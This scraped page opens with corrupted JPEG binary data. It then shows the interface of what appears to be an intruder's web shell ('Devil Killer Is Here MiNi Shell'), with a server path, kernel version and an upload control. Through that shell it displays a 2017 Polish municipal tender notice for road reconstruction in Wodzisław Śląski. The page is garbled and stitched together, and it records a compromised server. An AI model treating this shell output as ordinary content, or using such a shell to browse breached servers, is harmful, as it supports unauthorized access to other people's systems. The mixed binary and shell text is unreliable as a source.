JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170124/12930-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.gmwodzislawsl.finn.pl/bipkod/013' target='_blank'>http://bip.gmwodzislawsl.finn.pl/bipkod/013</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 12930 - 2017
              z dnia 2017-01-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wodzisław Śląski: 1)UDROŻNIENIE RUCHU W POŁUDNIOWEJ CZĘŚCI SUBREGIONU ZACHODNIEGO ETAP I, zadanie 1 i zadanie 3  przebudowa ulicy Matuszczyka w Wodzisławiu Śląskim
2)PLAN ROZWOJU SIECI DRÓG  Modernizacja ulicy Osadniczej  ETAP I
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Wodzisław Śląski, krajowy numer identyfikacyjny
              000526883, ul.
              ul. Bogumińska 
              4,
              44-300 
              Wodzisław Śląski, woj.
              śląskie, państwo
              Polska, tel.
              +48324590431, e-mail
              kancelaria@wodzislaw-slaski.pl, faks
              +48327218703.
              <br />
              Adres strony internetowej (URL): www.wodzislaw-slaski.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.bip.wodzislaw-slaski.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b></div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.gmwodzislawsl.finn.pl/bipkod/013</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.gmwodzislawsl.finn.pl/bipkod/013</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnejpocztą, kurierem lub osobiście.<br />
                Adres:
                <br />Urząd Miasta Wodzisławia Śląskiego - Biuro Obsługi Klienta, ul. Bogumińska 4; 44300 Wodisław Śląski</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>1)UDROŻNIENIE RUCHU W POŁUDNIOWEJ CZĘŚCI SUBREGIONU ZACHODNIEGO ETAP I, zadanie 1 i zadanie 3  przebudowa ulicy Matuszczyka w Wodzisławiu Śląskim
2)PLAN ROZWOJU SIECI DRÓG  Modernizacja ulicy Osadniczej  ETAP I
<br /><b>Numer referencyjny: </b>BZP.271.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem niniejszego postępowania jest zamówienie które obejmuje:
1)Udrożnienie ruchu w południowej części Subregionu Zachodniego Etap I, zadanie 1 i zadanie 3  przebudowa ulicy Matuszczyka w Wodzisławiu Śląskim
a)zakres przedmiotu zamówienia obejmuje:
-przebudowę jezdni od km 0+39,00 do km 0+421,5 oraz od km 0+580,00 do km 0+894,00, 
-budowę czterech zatok autobusowych, 
- przebudowę chodników po obydwu stronach drogi z wyłączeniem odcinka chodnika po  stronie lewej od km 0 + 123,00  do 0 + 383,00 . 
- budowę ekranów akustycznych, 
- przebudowę kanalizacji deszczowej, 
- wykonanie barier energochłonnych oraz wygrodzeń dla pieszych, 
- przebudowę oświetlenia ulicznego, 
- przebudowę kolidujących odcinków sieci teletechnicznej i gazowej oraz zabezpieczenie sieci wodociągowej, 
- wykonanie oznakowania pionowego i poziomego,
Po przebudowie nośność nawierzchni jezdni na całej długości będzie wynosić 115 kN.
Długość drogi  0,697 km
Kategoria ruchu  4.
Klasa drogi  Z.
Droga po przebudowie będzie posiadać dwie jezdnie po dwa pasy ruchu w każdym kierunku. Jezdnie będą posiadać szerokość 7,0 m i zostaną rozdzielone wyspą środkową o szerokości 4,0 m. Inwestycja obejmie również przebudowę skrzyżowania z drogą wewnętrzną do postaci skrzyżowania skanalizowanego. 

2)Plan Rozwoju Sieci dróg - Modernizacja ulicy Osadniczej  Etap I 
a) zakres przedmiotu zamówienia obejmuje:
- przebudowę jezdni od skrzyżowania z ul. Pałacową do skrzyżowania w rejonie posesji nr 9 na długości ok 330mb.
- Szczegółowy zakres przedmiotu zamówienia został określony w dokumentacjach projektowych. 

<br /><br /><b>II.5) Główny kod CPV: </b>45233000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/08/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że:
a) wykonał w ostatnich pięciu latach min. 1 robotę budowlaną polegającą na: 
- budowie (przebudowie) dróg minimum klasy Z,  o nawierzchni z asfaltobetonu i długości min 0,5 km, o wartości brutto min. 3.000.000 zł.
- wykonaniu ekranów akustycznych o długości min 200 m o wartości brutto min. 800.000 zł.
- wykonaniu oświetlenia ulicznego o  wartości brutto min. 100 000,00 zł.
 gdy składa ofertę na pierwszą lub pierwszą i druga część zamówienia. W/w zakres może być realizowany na podstawie jednej lub kilku umów.
- min. 1 robotę budowlaną polegającą na budowie (przebudowie) drogi  o nawierzchni z asfaltobetonu  o wartości min. 100 000,00 zł. zł  gdy składa ofertę na drugą część zamówienia. 
b) Wykonawca spełni warunek jeżeli wykaże, że: 
- dysponuje minimum jedną osobą posiadającą uprawnienia zawodowe do geodezyjnych  pomiarów sytuacyjno-wysokościowych realizacyjnych i inwentaryzacyjnych  oraz  geodezyjnej obsługi inwestycji - dla obydwu części zamówienia;
- dysponuje minimum jedną osobą posiadającą uprawnienia zawodowe w zakresie kierowania robotami budowlanymi obejmującymi specjalność drogową bez ograniczeń, która  jest czynnym członkiem Polskiej Izby Inżynierów  Budownictwa - dla pierwszej części zamówienia; 
- dysponuje minimum jedną osobą posiadającą uprawnienia zawodowe w zakresie kierowania robotami budowlanymi obejmującymi sieci elektroenergetyczne bez ograniczeń, która  jest czynnym członkiem Polskiej Izby Inżynierów  Budownictwa - dla pierwszej części zamówienia; 
- dysponuje minimum jedną osobą posiadającą uprawnienia zawodowe w zakresie kierowania robotami budowlanymi obejmującymi sieci sanitarne i gazowe bez ograniczeń, która  jest czynnym członkiem Polskiej Izby Inżynierów  Budownictwa - dla pierwszej części zamówienia; 
- dysponuje minimum jedną osobą posiadającą uprawnienia zawodowe w zakresie kierowania robotami budowlanymi obejmującymi sieci teletechniczne  bez ograniczeń, która  jest czynnym członkiem Polskiej Izby Inżynierów  Budownictwa - dla pierwszej części zamówienia; 
- dysponuje minimum jedną osobą posiadającą uprawnienia zawodowe w zakresie kierowania robotami budowlanymi obejmującymi  specjalność drogową w ograniczonym zakresie lub bez ograniczeń, która  jest czynnym członkiem Polskiej Izby Inżynierów  Budownictwa - dla drugiej części zamówienia; 
.    Zamawiający informuje, że posiadane przez osoby o których mowa w pkt 8.1.pkt 1) b. SIWZ uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994r., Prawo budowlane (Dz. U. z 2013r., poz. 1409 z późn. zm.). Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie wykazują te dokumenty, jako obowiązujące. 
Zamawiający dopuszcza również możliwość uznania uprawnień wynikających z innych niż krajowe przepisów np. treści dyrektyw, zawartych umów międzynarodowych i innych przepisów, które potwierdzą spełnianie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia. 
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2013r., poz. 1409 z późn. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r., Nr 63, poz. 394). 
Wykonawca wykazuje spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia może skorzystać z przygotowanego przez Zamawiającego załącznika.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 
 UWAGA! Przeliczenie wartości zadań podanych w walutach obcych odbywać się będzie wg średniego kursu Narodowego Banku Polskiego obowiązującego w dniu opublikowania ogłoszenia o niniejszym zamówieniu.

oświadczenia na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy  wskazanych w wykazie osób.

wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">do oferty należy dołączyć kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej, pełnomocnictwo (jeżeli dotyczy), zobowiązanie podmiotu trzeciego (jeżeli dotyczy).</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b><br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Oferta musi być zabezpieczona wadium w wysokości:
-  10.000 zł. (słownie: dziesięć tysięcy złotych 00/100 ) dla pierwszej części zamówienia;
- 1.000 zł. ( słownie: jeden tysiąc złotych 00/100 ) dla drugiej części zamówienia. 
- 11.000 zł. (słownie: jedenaście tysięcy złotych 00/100) jeśli oferent złoży ofertę na dwie części.
 2.Wadium może być wniesione zgodnie z art. 45 ustawy PZP, w jednej lub kilku następujących formach:
a.pieniądzu,
b.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c.gwarancjach bankowych,
d.gwarancjach ubezpieczeniowych,
e.poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3.Wadium wniesione w jednej z form określonych  w pkt 2 b-e musi w swojej treści  obejmować okres związania ofertą.
4.Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto bankowe w PEKAO S.A. / Rybnik 19  1240  4357  1111  0010  3970  9094
5.Wadium w pozostałych formach należy złożyć w formie oryginału do oferty.
6.Zobowiązanie do zapłaty wadium wniesionego w formie innej aniżeli pieniężnej winno obejmować uwarunkowania zawarte w art.46 ust. 4a oraz art. 46 ust. 5  ustawy PZP, tj. 
a.Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń  lub dokumentów potwierdzających  okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o których mowa w art.  25a ust. 1, pełnomocnictw, lub nie wyraził zgody  na poprawienie  omyłki, o której mowa  w art. 87 ust. 2 pkt 3, co spowodowało   brak możliwości  wybrania ofert  złożonej  przez wykonawcę  jako najkorzystniejszej.   
b.Wykonawca, którego  oferta została   wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
c.Wykonawca, którego  oferta została wybrana nie wniósł  wymaganego  zabezpieczenia  należytego wykonania. 
d.zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 

7.Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w  pkt. 17.4 niniejszej SIWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert). 
8.Nie wniesienie  wadium na zasadach określonych w specyfikacji lub wniesienie w sposób  nieprawidłowy stanowić będzie   podstawę  do  odrzucania  oferty.   
9.Zamawiający dokonuje zwrotu wadium w przypadkach i terminach wymienionych w art. 46 ust. 1, ust.1a, ust. 2 ustawy  PZP. 
10.Zamawiający zatrzymuje wadium wraz odsetkami, w przypadku zaistnienia okoliczności, 
o których mowa w art. 46 ust. 4a i ust. 5 ustawy Pzp.
11.W przypadku oferty składanej przez konsorcjum wadium wnoszone w formie gwarancji bankowej, ubezpieczeniowej winno być wystawione na każdego z członków konsorcjum albo też wymaga się, aby z treści ww. dokumentu wynikało, że Wykonawcy wchodzący w skład konsorcjum są w jakikolwiek sposób dokumentem tym objęci.
12.Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
a.pieniężnej  dokument potwierdzający dokonanie przelewu wadium został załączony do oferty;
b.innej niż pieniądz  oryginał dokumentu został złożony  do oferty.
13.Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy PZP.
14.Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa PZP.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
